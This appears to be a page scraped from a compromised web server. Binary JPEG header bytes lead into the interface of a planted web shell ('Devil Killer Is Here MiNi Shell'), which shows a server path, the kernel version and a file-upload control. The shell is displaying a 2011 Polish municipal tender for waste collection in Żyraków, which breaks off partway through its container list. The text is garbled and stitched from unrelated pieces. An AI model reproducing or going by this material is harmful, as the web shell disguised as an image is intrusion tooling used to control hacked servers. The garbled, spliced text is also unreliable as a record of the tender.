JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/325781-N-2011.html

<p class="kh_header"><b>Żyraków: Porządkowanie i wywóz odpadów stałych z miejsc użyteczności publicznej znajdujących się na terenie gminy Żyraków w roku 2012</b><br>
<b>Numer ogłoszenia: 325781 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żyraków , 39-204 Żyraków, woj. podkarpackie, tel. 014 680 71 21, faks 014 680 71 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Porządkowanie i wywóz odpadów stałych z miejsc użyteczności publicznej znajdujących się na terenie gminy Żyraków w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 zamówienia - Porządkowanie przystanków i wywóz odpadów z koszy na śmieci:
W zakres zamówienia wchodzi: sprzątanie zatok autobusowych i przystanków, opróżnianie koszy na śmieci o pojemności 70 l, wywóz odpadów stałych na wysypisko śmieci

Wykaz przystanków objętych usługą:
1. Zawierzbie Betoniarnia	1 szt	70 litrów
2. Zawierzbie Cegielnia	1 szt	70 litrów
3. Straszęcin Mała Wola - skrzyżowanie (tylko zebranie zgromadzonych odpadów) 1 szt	70 litrów
4. Straszęcin Mała Wola - Koziara 	1 szt	70 litrów
5. Straszęcin Kiosk Ruchu	 1 szt	 70 litrów
6. Straszęcin Obok starej szkoły	1 szt	70 litrów
7. Straszęcin Plebania	1 szt	70 litrów
8. Straszęcin Obok Spółdzielni Mieszkaniowej	1 szt	70 litrów
9. Straszęcin Przed mostem na rzece Grabiniance	1 szt	70 litrów
10. Wola Wielka	Obok posesji p. Sarama	1 szt	70 litrów
11. Wola Wielka	Szkoła 1 szt	70 litrów
12. Góra Motyczna Za cmentarzem, przy boisku sportowym	1 szt	70 litrów
13. Wiewiórka Obok drogi do Woli Wielkiej	1 szt	70 litrów
14. Wiewiórka Szkoła	1 szt	70 litrów
15. Wiewiórka Koniec wsi	1 szt	70 litrów
16. Zasów Przed kościołem	1 szt	70 litrów
17. Zasów Obok p. Typer	1 szt	70 litrów
18. Zasów Obok sklepu p. Dziadosz	 1 szt	70 litrów
19. Nagoszyn Cieszęciny Przed posesją p. Pluta	1 szt	70 litrów
20. Nagoszyn Cieszęciny Tzw. Dąbki	1 szt	70 litrów
21. Mokre Początek wsi Mokre od strony Cieszęciny	1 szt	70 litrów
22. Mokre Środek wsi Mokre	1 szt	70 litrów
23. Mokre Koniec wsi Mokre	1 szt	70 litrów
24. Żyraków Obok remizy OSP	1 szt	70 litrów
25. Żyraków Szkoła	1 szt	70 litrów
26. Żyraków Obok posesji Koziara Mirosław	1 szt	70 litrów
27. Żyraków W parku przy budynku starej gminy	1 szt	70 litrów
28. Żyraków Park naprzeciw budynku Policji	1 szt	70 litrów
29. Żyraków Przy Urzędzie Gminy	1 szt	70 litrów
30. Żyraków Rynek 	6 szt.	60 lirów
31. Wola Żyrakowska Młyn	1 szt	70 litrów
32. Wola Żyrakowska Sklep przy stawie	1 szt	70 litrów
33. Bobrowa Obok posesji p. Chmielowski	1 szt	70 litrów
34. Bobrowa Obok posesji p. Marzec Krzysztof	1 szt	70 litrów
35. Bobrowa Centrum wsi	1 szt	70 litrów
36. Bobrowa SKR	1 szt	70 litrów
37. Bobrowa Obok posesji p. Obaz Tadeusz	1 szt	70 litrów
38. Bobrowa Wola Skrzyżowanie	1 szt	70 litrów
39. Bobrowa Wola Obok budynku starej szkoły	1 szt	70 litrów
40. Nagoszyn Obok kościoła	1 szt	70 litrów
41. Nagoszyn Obok sklepu p. Róg Władysław	1 szt	70 litrów
42. Nagoszyn Obok szkoły	1 szt	70 litrów
43. Nagoszyn Naprzeciw tzw. Garaży	1 szt	70 litrów
44. Nagoszyn k. posesji p. Kołodziej	 1 szt	70 litrów
45. Nagoszyn Skrzyżowanie na Łączki i Przecław	1 szt	70 litrów
46. Nagoszyn Koniec	1 szt	70 litrów
47. Korzeniów początek wsi	1 szt	70 litrów
48. Korzeniów Przystanek k. remizy OSP	1 szt	70 litrów
49. Korzeniów Koniec wsi Korzeniów	 1 szt	70 litrów
Częstotliwość  realizacji usługi: obowiązkowo 1 raz w miesiącu najpóźniej do 5 dnia każdego miesiąca. Zamawiający może zgłosić konieczność wywozu w formie dodatkowego zgłoszenia, który należy zrealizować w ciągu 24 godzin od chwili zgłoszenia. 

Część 2 zamówienia - Wywóz odpadów komunalnych z kontenerów.

Do obowiązków wykonawcy należeć będzie: dostarczenie własnych kontenerów przeznaczonych do wywozu odpadów stałych, w terminie 2 dni od dnia podpisania umowy, które będą ustawione przez cały okres trwania umowy w miejscach wskazanych w poniższym wykazie. Pojemności i ilości kontenerów zostały określone w poniższym wykazie, wywóz odpadów z kontenerów na wysypisko śmieci, utrzymanie miejsc obok kontenerów w należytym stanie technicznym i sanitarnym, dezynfekcja kontenerów raz w miesiącu w miesiącach kiedy występują wysokie temperatury tj. obowiązkowo od miesiąca maja do września.

Wykaz kontenerów objętych usługą:
1. Żyraków Obok Urzędu Gminy	2 szt.,	V - 1100 L
2. Bobrowa	Remiza OSP 	1 szt.,	V - 1100 L
3. Bobrowa 	Biblioteka	1 szt.,	V - 110 L
4. Bobrowa Wola	Biblioteka	1 szt.,	V - 110 L
5. Nagoszyn	Remiza OSP (biblioteka)	1 szt.,	V - 1100 L
6. Góra Motyczna	Remiza OSP	1 szt.,	V - 1100 L
7. Korzeniów	Ośrodek Promocji i Aktywności Zawodowej i Społecznej Osób Niepełnosprawnych Radość w Korzeniowie	1 szt.,	V - 1100 L
8. Korzeniów	Remiza OSP	 1 szt.,	V - 1100 L
9. Wola Żyrakowska	Ośrodek Kultury	1 szt.,	V - 1100 L
10. Zasów	Biblioteka Publiczna	1 szt.,	V - 1100 L
11. Straszęcin	Remiza OSP	 1 szt.,	V - 1100 L
12. Nagoszyn	Cmentarz	1 szt.,	SPW -10m3
13. Wiewiórka	Cmentarz	1 szt.,	SPW -10m3
14. Straszęcin	Cmentarz	1 szt.,	SPW-10m3
15. Korzeniów	Cmentarz	1 szt.,	SPW -10m3
16. Góra Motyczna	Cmentarz	1 szt.,	SPW -10m3
17. Zasów	Cmentarz	2 szt., 	SPW -10m3
18. Żyraków	Cmentarz	1 szt.,	SPW -10m3
Częstotliwość  realizacji usługi: obowiązkowo 1 raz w miesiącu najpóźniej do 5 dnia każdego miesiąca. Zamawiający może zgłosić konieczność wywozu w formie dodatkowego zgłoszenia, który należy zrealizować w ciągu 24 godzin od chwili zgłoszenia.

Część 3 zamówienia - Wywóz odpadów komunalnych we workach 80 litrowych.

Wywóz odpadów komunalnych w workach foliowych 80 litrowych na każdorazowe zgłoszenie Zamawiającego w sytuacji, gdy zajdzie potrzeba. Przewiduje się wywóz minimum 60 worków, z tym że Zamawiający zastrzega sobie możliwość zmiany zakresu, lecz nie mniej niż 20 %.

Do obowiązków wykonawcy należeć będzie: odbiór worków 80 litrowych z odpadami,wWywóz odpadów na wysypisko śmieci

Częstotliwość realizacji usługi: na każdorazowe zgłoszenie telefoniczne Zamawiającego w ciągu 24 godzin od chwili zgłoszenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2 do SIWZ. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania niezbędnej wiedzy i doświadczenia do prawidłowego zrealizowania zamówienia jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2 do SIWZ. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2 do SIWZ. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2 do SIWZ. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej do wykonania zamówienia jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2 do SIWZ. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 do SIWZ,
2)Stosowne pełnomocnictwo(a).
3)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia (jeżeli dotyczy).
4) Oświadczenie o nieujawnianiu informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji - załącznik nr 4 do SIWZ (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Prawa Zamówień Publicznych ZAMAWIAJĄCY przewiduje zmiany umowy, które dotyczą:
a)zmiany terminu realizacji przedmiotu zamówienia w uzgodnieniu z Wykonawcą pod warunkiem zmiany obowiązującego stanu prawnego regulującego wykonywanie przedmiotu zamówienia, co powodowałoby działanie Stron niezgodnie z prawem.
b)zmiany terminu comiesięcznej realizacji zamówienia pod warunkiem wystąpienia trudności po stronie Zamawiającego z przeprowadzeniem kontroli wywozów odpadów.
c)skrócenia okresu realizacji umowy pod warunkiem wyczerpania maksymalnej wartości wynagrodzenia określonego w § 4 ust 4 wzoru umowy.
d)zmiany terminu realizacji umowy pod warunkiem pozyskania przez Zamawiającego informacji, że realizacja zamówienia nie leży w interesie publicznym.
e)zmniejszenia zakresu rzeczowego zamówienia, lecz nie mniej niż o 20% pod warunkiem wystąpienia okoliczności ograniczających możliwości finansowe Zamawiającego
f)zwiększenia częstotliwości wykonywania usług w miesiącu pod warunkiem nadmiaru odpadów. Wynagrodzenie przy opróżnieniu jednorazowo wszystkich punktów określonych dla poszczególnych części zamówienia pozostaje stałe jak określono w § 4 ust. 1 wzoru umowy, z tym że całkowite wynagrodzenie wykonawcy nie może przekroczyć maksymalnego wynagrodzenia określonego w § 4 ust 4 wzoru umowy. Rozliczenie na podstawie ceny jednostkowej za dodatkowy wywóz będzie stosowane tylko na potrzeby ewentualnych, awaryjnych zgłoszeń.
g)zwiększenia ilości sprzątanych przystanków lub opróżnianych kontenerów na potrzeby zamawiającego. Wówczas rozliczenie odbywać się będzie na podstawie stawek jednostkowych za dodatkowy wywóz, lecz całkowite wynagrodzenie wykonawcy nie może przekroczyć maksymalnego wynagrodzenia określonego w § 4 ust 4 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrakow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Żyrakowie, 39-204 Żyraków 137, pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 09:50, miejsce: Urząd Gminy w Żyrakowie, 39-204 Żyraków 137, pokój nr 21 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Porządkowanie przystanków i wywóz odpadów z koszy na śmieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres zamówienia wchodzi: sprzątanie zatok autobusowych i przystanków, opróżnianie koszy na śmieci o pojemności 60 i 70 l, wywóz odpadów stałych na wysypisko śmieci

Wykaz przystanków objętych usługą:
1. Zawierzbie Betoniarnia	1 szt	70 litrów
2. Zawierzbie Cegielnia	1 szt	70 litrów
3. Straszęcin Mała Wola - skrzyżowanie (tylko zebranie zgromadzonych odpadów) 1 szt	70 litrów
4. Straszęcin Mała Wola - Koziara 	1 szt	70 litrów
5. Straszęcin Kiosk Ruchu	 1 szt	 70 litrów
6. Straszęcin Obok starej szkoły	1 szt	70 litrów
7. Straszęcin Plebania	1 szt	70 litrów
8. Straszęcin Obok Spółdzielni Mieszkaniowej	1 szt	70 litrów
9. Straszęcin Przed mostem na rzece Grabiniance	1 szt	70 litrów
10. Wola Wielka	Obok posesji p. Sarama	1 szt	70 litrów
11. Wola Wielka	Szkoła 1 szt	70 litrów
12. Góra Motyczna Za cmentarzem, przy boisku sportowym	1 szt	70 litrów
13. Wiewiórka Obok drogi do Woli Wielkiej	1 szt	70 litrów
14. Wiewiórka Szkoła	1 szt	70 litrów
15. Wiewiórka Koniec wsi	1 szt	70 litrów
16. Zasów Przed kościołem	1 szt	70 litrów
17. Zasów Obok p. Typer	1 szt	70 litrów
18. Zasów Obok sklepu p. Dziadosz	 1 szt	70 litrów
19. Nagoszyn Cieszęciny Przed posesją p. Pluta	1 szt	70 litrów
20. Nagoszyn Cieszęciny Tzw. Dąbki	1 szt	70 litrów
21. Mokre Początek wsi Mokre od strony Cieszęciny	1 szt	70 litrów
22. Mokre Środek wsi Mokre	1 szt	70 litrów
23. Mokre Koniec wsi Mokre	1 szt	70 litrów
24. Żyraków Obok remizy OSP	1 szt	70 litrów
25. Żyraków Szkoła	1 szt	70 litrów
26. Żyraków Obok posesji Koziara Mirosław	1 szt	70 litrów
27. Żyraków W parku przy budynku starej gminy	1 szt	70 litrów
28. Żyraków Park naprzeciw budynku Policji	1 szt	70 litrów
29. Żyraków Przy Urzędzie Gminy	1 szt	70 litrów
30. Żyraków Rynek 	6 szt.	60 lirów
31. Wola Żyrakowska Młyn	1 szt	70 litrów
32. Wola Żyrakowska Sklep przy stawie	1 szt	70 litrów
33. Bobrowa Obok posesji p. Chmielowski	1 szt	70 litrów
34. Bobrowa Obok posesji p. Marzec Krzysztof	1 szt	70 litrów
35. Bobrowa Centrum wsi	1 szt	70 litrów
36. Bobrowa SKR	1 szt	70 litrów
37. Bobrowa Obok posesji p. Obaz Tadeusz	1 szt	70 litrów
38. Bobrowa Wola Skrzyżowanie	1 szt	70 litrów
39. Bobrowa Wola Obok budynku starej szkoły	1 szt	70 litrów
40. Nagoszyn Obok kościoła	1 szt	70 litrów
41. Nagoszyn Obok sklepu p. Róg Władysław	1 szt	70 litrów
42. Nagoszyn Obok szkoły	1 szt	70 litrów
43. Nagoszyn Naprzeciw tzw. Garaży	1 szt	70 litrów
44. Nagoszyn k. posesji p. Kołodziej	 1 szt	70 litrów
45. Nagoszyn Skrzyżowanie na Łączki i Przecław	1 szt	70 litrów
46. Nagoszyn Koniec	1 szt	70 litrów
47. Korzeniów początek wsi	1 szt	70 litrów
48. Korzeniów Przystanek k. remizy OSP	1 szt	70 litrów
49. Korzeniów Koniec wsi Korzeniów	 1 szt	70 litrów
Częstotliwość  realizacji usługi: obowiązkowo 1 raz w miesiącu najpóźniej do 5 dnia każdego miesiąca. Zamawiający może zgłosić konieczność wywozu w formie dodatkowego zgłoszenia, który należy zrealizować w ciągu 24 godzin od chwili zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wywóz odpadów komunalnych z kontenerów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków wykonawcy należeć będzie: dostarczenie własnych kontenerów przeznaczonych do wywozu odpadów stałych, w terminie 2 dni od dnia podpisania umowy, które będą ustawione przez cały okres trwania umowy w miejscach wskazanych w poniższym wykazie. Pojemności i ilości kontenerów zostały określone w poniższym wykazie, wywóz odpadów z kontenerów na wysypisko śmieci, utrzymanie miejsc obok kontenerów w należytym stanie technicznym i sanitarnym, dezynfekcja kontenerów raz w miesiącu w miesiącach kiedy występują wysokie temperatury tj. obowiązkowo od miesiąca maja do września.

Wykaz kontenerów objętych usługą:
1. Żyraków Obok Urzędu Gminy	2 szt.,	V - 1100 L
2. Bobrowa	Remiza OSP 	1 szt.,	V - 1100 L
3. Bobrowa 	Biblioteka	1 szt.,	V - 110 L
4. Bobrowa Wola	Biblioteka	1 szt.,	V - 110 L
5. Nagoszyn	Remiza OSP (biblioteka)	1 szt.,	V - 1100 L
6. Góra Motyczna	Remiza OSP	1 szt.,	V - 1100 L
7. Korzeniów	Ośrodek Promocji i Aktywności Zawodowej i Społecznej Osób Niepełnosprawnych Radość w Korzeniowie	1 szt.,	V - 1100 L
8. Korzeniów	Remiza OSP	 1 szt.,	V - 1100 L
9. Wola Żyrakowska	Ośrodek Kultury	1 szt.,	V - 1100 L
10. Zasów	Biblioteka Publiczna	1 szt.,	V - 1100 L
11. Straszęcin	Remiza OSP	 1 szt.,	V - 1100 L
12. Nagoszyn	Cmentarz	1 szt.,	SPW -10m3
13. Wiewiórka	Cmentarz	1 szt.,	SPW -10m3
14. Straszęcin	Cmentarz	1 szt.,	SPW-10m3
15. Korzeniów	Cmentarz	1 szt.,	SPW -10m3
16. Góra Motyczna	Cmentarz	1 szt.,	SPW -10m3
17. Zasów	Cmentarz	2 szt., 	SPW -10m3
18. Żyraków	Cmentarz	1 szt.,	SPW -10m3
